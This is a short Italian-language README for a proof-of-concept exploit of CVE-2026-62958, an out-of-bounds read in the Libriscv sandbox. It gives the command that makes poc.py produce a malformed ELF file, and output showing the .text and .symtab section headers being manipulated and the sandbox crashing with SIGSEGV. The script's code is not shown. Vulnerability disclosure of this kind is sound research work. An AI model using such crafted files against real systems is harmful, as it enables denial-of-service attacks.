
Exploit proof-of-concept per CVE-2026-62958 che dimostra una vulnerabilità di lettura fuori dai limiti nel sandbox Libriscv, permettendo il crash del sandbox tramite un file ELF appositamente creato.
Una vulnerabilità in Libriscv permette all'attaccante di far crashare la sandbox utilizzando una lettura fuori dai limiti.
Per creare Bad elf:
python3 poc.py samplefile poisoned_file
Risultati:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)